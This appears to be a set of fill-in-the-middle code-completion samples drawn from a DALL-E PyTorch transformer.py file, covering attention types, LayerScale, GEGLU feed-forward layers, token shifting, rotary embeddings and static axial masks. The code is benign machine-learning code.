elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
|
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
            text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.))  # text is given a position of -10, far apart from the image axial positions, which lie in the range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask
| attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable) | conditional_block |
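The `_get_attention_mask` method above lets the axial attention types be simulated with full attention plus a static boolean mask when `optimize_for_inference` is set. The standalone sketch below (not part of the original file) rebuilds the same row/column masks for a toy configuration so the pattern can be inspected directly; the sizes used are made up.

# --- illustrative sketch: axial static masks (toy sizes, assumed values) ---
import torch

def build_static_mask(attn_type, seq_len, image_fmap_size):
    # mirrors Transformer._get_attention_mask above
    img_seq_len = image_fmap_size ** 2
    text_len = seq_len + 1 - img_seq_len
    mask = torch.zeros(seq_len, seq_len, dtype=torch.bool)
    mask[:, :text_len] = True  # every position may attend to all text tokens
    if attn_type == 'axial_row':
        for row in range(image_fmap_size):
            begin = text_len + row * image_fmap_size
            end = text_len + (row + 1) * image_fmap_size
            mask[begin:end, begin:end] = True  # image tokens attend within their own row
    elif attn_type == 'axial_col':
        for col in range(image_fmap_size):
            begin = text_len + col
            mask[begin::image_fmap_size, begin::image_fmap_size] = True  # within their own column
    return mask

if __name__ == '__main__':
    # seq_len = 11 and image_fmap_size = 3 are made-up toy values
    print(build_static_mask('axial_row', seq_len=11, image_fmap_size=3).int())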
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
    Reconstructs the full sequence before the layer and
    keeps only the suffix of the output after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs)
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
|
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
        optimize_for_inference = False,  # use cache-friendly masked attention instead of a sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable)
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
            text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.))  # text is given a position of -10, far apart from the image axial positions, which lie in the range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask
| def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale | identifier_body |
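The `identifier_body` target above is the body of `LayerScale` (arXiv 2103.17239), which scales each wrapped layer's output by a small learnable per-channel factor whose initial value shrinks with depth. A minimal self-contained sketch with made-up sizes follows; it is an illustration of the idea, not the library's implementation.

# --- illustrative sketch: depth-dependent residual scaling (assumed toy sizes) ---
import torch
from torch import nn

class TinyLayerScale(nn.Module):
    def __init__(self, dim, depth, fn):
        super().__init__()
        # same schedule as LayerScale above: 0.1 up to depth 18, then 1e-5, then 1e-6
        init_eps = 0.1 if depth <= 18 else (1e-5 if depth <= 24 else 1e-6)
        self.scale = nn.Parameter(torch.full((1, 1, dim), init_eps))
        self.fn = fn

    def forward(self, x, **kwargs):
        return self.fn(x, **kwargs) * self.scale

# usage with a made-up dimension and layer index
block = TinyLayerScale(dim=8, depth=20, fn=nn.Linear(8, 8))
out = block(torch.randn(2, 4, 8))  # -> shape (2, 4, 8)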
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
    Reconstructs the full sequence before the layer and
    keeps only the suffix of the output after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs)
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class | (nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
        optimize_for_inference = False,  # use cache-friendly masked attention instead of a sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable)
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
            text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.))  # text is given a position of -10, far apart from the image axial positions, which lie in the range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask
| GEGLU | identifier_name |
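The masked identifier in the row above is `GEGLU`, the gated activation used inside `FeedForward`. The short standalone demonstration below (tensor sizes are made up) only illustrates the shape contract: an input of width 2 * d is split in half, one half gates the other through GELU, and the result has width d.

# --- illustrative sketch: GEGLU gating (assumed toy sizes) ---
import torch
import torch.nn.functional as F

def geglu(x):
    x, gates = x.chunk(2, dim=-1)
    return x * F.gelu(gates)

h = torch.randn(2, 5, 16)  # (batch, seq, 2 * inner_dim)
print(geglu(h).shape)      # torch.Size([2, 5, 8])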
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
    Reconstructs the full sequence before the layer and
    keeps only the suffix of the output after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn |
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
